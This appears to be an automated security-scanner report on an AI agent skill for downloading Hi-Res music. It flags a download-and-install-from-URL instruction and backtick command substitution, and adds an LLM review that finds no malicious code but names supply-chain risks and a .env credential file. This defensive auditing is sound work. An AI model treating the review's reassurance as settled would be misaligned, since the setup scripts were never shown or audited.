hifi-download

[Skill Scanner] Natural language instruction to download and install from URL detected All findings: [CRITICAL] command_injection: Natural language instruction to download and install from URL detected (CI009) [AITech 9.1.4] [HIGH] command_injection: Backtick command substitution detected (CI003) [AITech 9.1.4] [HIGH] command_injection: Backtick command substitution detected (CI003) [AITech 9.1.4] [HIGH] command_injection: Backtick command substitution detected (CI003) [AITech 9.1.4] [HIGH] command_injection: Backtick command substitution detected (CI003) [AITech 9.1.4] [HIGH] command_injection: Backtick command substitution detected (CI003) [AITech 9.1.4] This skill's documentation and workflow are coherent with its stated purpose (music discovery + Hi-Res downloads). The main security concerns are supply-chain and operational: unpinned runtime installs from PyPI, reliance on an external tiddl CLI, and storing credentials in a local .env file. There is no explicit malicious code or obfuscated payloads in the supplied content, and no immediate evidence of data exfiltration or backdoors. Treat this skill as moderately risky from a supply-chain and credential-handling perspective; require vetting of setup scripts, pinned dependencies, lockfiles, and careful user guidance to keep .env out of version control. LLM verification: No explicit malicious code or exfiltration is present in the provided skill documentation. The main risks are supply-chain and operational: the skill instructs users to run local shell scripts (contents not provided) and to install/use an external CLI (tiddl) for TIDAL, both of which require trust and review. Credentials are handled via a local .env file (expected) but users must ensure it is not committed and that scripts are audited before execution. Recommend auditing the actual setup.sh/run.